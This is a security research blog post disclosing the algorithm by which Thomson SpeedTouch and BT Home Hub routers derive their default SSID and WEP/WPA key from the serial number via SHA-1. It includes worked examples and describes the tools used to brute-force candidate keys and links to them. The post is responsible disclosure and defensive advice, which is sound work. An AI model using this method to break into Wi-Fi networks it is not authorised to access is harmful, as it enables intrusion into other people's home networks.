http://www.gnucitizen.org/blog/default-key-algorithm-in-thomson-and-bt-home-hub-routers/ Yes, we're back with more embedded devices vulnerability research! Andyes, we're also back with more security attacks against the BT HomeHub (most popular DSL router in the UK)! As you know, we encourage folks in the community to team up withGNUCITIZEN in different projects as we've had very successfulexperiences doing so. This time it was Kevin Devine's turn. Kevin, whois an independent senior security researcher, did an awesome job atreverse engineering the *default WEP/WPA key algorithm* used by someThomson Speedtouch routers including the BT Home Hub. Kevin noticedthat all the public vulnerability research conducted in the past forthe BT Home Hub had been released [1] by GNUCITIZEN, so he decided toshare his findings and work with us in this fascinating project. Asyou might already know, at GNUCITIZEN we're committed members of thewhite-hat community who feel that it's our responsibility to informthe public when a security issue exists. * Confirmed suspicions * Many of us involved researching the security of wireless home routershave always suspected that routers that come with default WEP/WPA keysfollow predictable algorithms for practical reasons. Yes, I'm talkingabout routers that come with those stickers [2] that include info suchas S/N, default SSID, and default WEP/WPA key. Chances are that if youown a wireless router which uses a default WEP or WPA key, such keycan be predicted based on publicly-available information such as therouter's MAC address or SSID. In other words: it's quite likely thatthe bad guys can break into your network if you're using the defaultencryption key. Thanks to Kevin, our suspicion that such issue existson the BT Home Hub has been confirmed (keep reading for moredetails!). Our advice is: *use WPA rather than WEP and change thedefault encryption key now!* * Brief history of default WEP/WPA key algorithms research * As far as I know, Kevin and james67 were the first researchers topublicly crack a default encryption key algorithm of a Wi-FI homerouter. Kevin cracked [3] the algorithm used by Netopia routers whichare shipped Eircom in Ireland and AT&T in the US (the second ISP wasnever reported, 0day!). On the other hand james67 [4] targeted [5] theNetgear DG834GT router shipped by SKY in the UK. Unfortunately,james67 did not [6] publish the details of the algorithm he crackedwhich is a shame as it means that we cannot learn from his research. * The Thomson Speedtouch default WEP/WPA algorithm * Unlike james67, Kevin's strategy to crack default WEP/WPA algorithmsinvolve debugging setup wizards shipped by some ISPs, as opposed todebugging the router which uses the default key algorithm. Kevinobtained a copy of such wizard ("stInstall.exe") provided by Orange inSpain - which can be found on broadband customers' installation CDs.Such setup utility allowed him to figure out the default keyalgorithm. In short we have: S/N -> hash -> default SSID and encryption key which can be read as: *a hashed version of the router's serial numberis generated which is then used to derive both, the default SSID andthe default encryption key.* This is just a high-level overview of thealgorithm. More specifically we have (quoted from Kevin's stkeys toolsource code comments): Take as example: "CP0615JT109 (53)" Remove the CC and PP values: CP0615109 Convert the "XXX" values to hexadecimal: CP0615313039 Process with SHA-1: 742da831d2b657fa53d347301ec610e1ebf8a3d0 The last 3 bytes are converted to 6 byte string, and appended tothe word "SpeedTouch" which becomes the default SSID: SpeedTouchF8A3D0 The first 5 bytes are converted to a 10 byte string which becomesthe default WEP/WPA key: 742DA831D2 In the case of the BT Home Hub, the only difference that is we onlytake the last two bytes (rather than 3 bytes) from the SHA1 hash toderive the SSID: S/N: CP0647EH6DM(BF) Remove CC and PP values: CP06476DM "XXX" values hex-encoded: CP064736444D SHA1-ed: 06f48a28eba1ab896a396077d772fd65503b8df3 Default SSID: BTHomeHub-8DF3 Default encryption key: 06f48a28eb By brute-forcing possible serial numbers and deriving the default SSIDand encryption key, we can find possible keys for a given defaultSSID, which is exactly what Kevin's stkeys [7] tool does. The bigger the number of hexadecimal digits the target SSID has, thesmaller the number of generated possible keys is. For instance, if thetarget SSID is "SpeedTouchF8A3D0″, we can narrow down the number ofpossible keys to only two. On the other side, a target SSID with only4 hex digits (2 bytes) such as "BTHomeHub-20E3″ would give us 80possible keys on average. We've tested ST585v6 which is shipped by Orange in Spain. ThomsonSpeedtouch routers provided by Orange in Spain come with WPA enabledby default. Being able to *narrow down the number of possible defaultWPA keys to only two* using Kevin's tool is quite remarkable. _Spanish translation of previous paragraph:_ _Hemos probado el ataque contra el ST585v6 que viene con lasconexiones de banda ancha de Orange en España. Los routers ThomsonSpeedtouch que son proveidos por Orange en España vienen con llave WPAactivada por defecto. El poder reducir el numero de posibles llavesWPA que vienen por defecto a solo dos usando la herramienta de Kevines formidable!_ In the case of the BT Home Hub in the UK (which only comes with 40bits WEP encryption by default by the way), we can narrow down thenumber of possible keys to about 80. In order to avoid thebrute-forcing computation time required by the "stkeys" tool, Icreated "BTHHkeygen" which looks up the possible keys for a given SSIDfrom a pre-generated "SSID->keys" table. Think of it as a rainbowtable for cracking the BT Home Hub's default WEP encryption key. Oncethe list of around 80 keys is obtained, the second step in the attackis to try each of them automatically, until the valid key isidentified. For this purpose I created "BTHHkeybf" which is a fancywrapper around the "iwconfig" Linux tool. We tested three differentBT Home Hubs, and the the attack seems to work fine. _The BT Home Hub v1.5 model uses a different algorithm which we havenot attempted to crack yet._ There is one thing that I want to mention regarding this attack whenlaunched against a BT Home Hub: breaking into a BT Home Hub Wi-Finetwork which uses default settings (40 bits WEP) has always beenpossible in a matter of minutes (if packet injection attacks are used)since the Home Hub was released into the market. Therefore, thispredictable-default-key attack doesn't change the current state of theBT Home Hub's Wi-Fi insecurity. It's always been known that BT HomeHub Wi-Fi networks can be easily broken into by cracking the WEP key![8] * PoC * BTHHkeygen (including rainbow tables) and BTHHkeybf can be found here:http://conference.hitb.org/hitbsecconf2008dubai/materials/D2T1%20-%20Adrian%20Pastor%20-%20Cracking%20Into%20Embeded%20Devices%20and%20Beyond.zip(located on the "\BT Home Hub\demo_exploits\Default WEP key cracking\" folder) * About GNUCITIZEN * GNUCITIZEN is a Cutting Edge, Ethical Hacker Outfit, Information ThinkTank, which primarily deals with all aspects of the art of hacking.Our work has been featured in established magazines and informationportals, such as Wired, Eweek, The Register, PC Week, IDG, BBC andmany others. The members of the GNUCITIZEN group are well known andwell established experts in the Information Security, Black PublicRelations (PR) Industries and Hacker Circles with widely recognizedexperience in the government and corporate sectors and the open sourcecommunity. * References * [1] http://www.google.co.uk/search?q=site:gnucitizen.org+bt+home+hub&num=100&hl=en&filter=0[2] http://www.belkin.com/support/dl/assets/uk-labels/bthomehub2.jpg[3] http://h1.ripway.com/kevindevine/wep_key.html[4] http://www.skyuser.co.uk/forum/blogs/james67/[5] http://www.skyuser.co.uk/forum/sky-broadband-help/20295-breaking-terms-conditions-your-views-welcome-2.html#post128738[6] http://www.theregister.co.uk/2008/02/21/sky_broadband_wi_fi_keys_unpicked/[7] http://weiss.u40.hosting.digiweb.ie/stech/stkeys.zip[8] http://www.hackernotcracker.com/2007-06/using-aircrack-ngaireplay-ng-under-injection-monitor-mode-in-windows.html -- Adrian 'pagvac' Pastor | Security Consultant and White Hat Hacker | GNUCITIZENgnucitizen.com
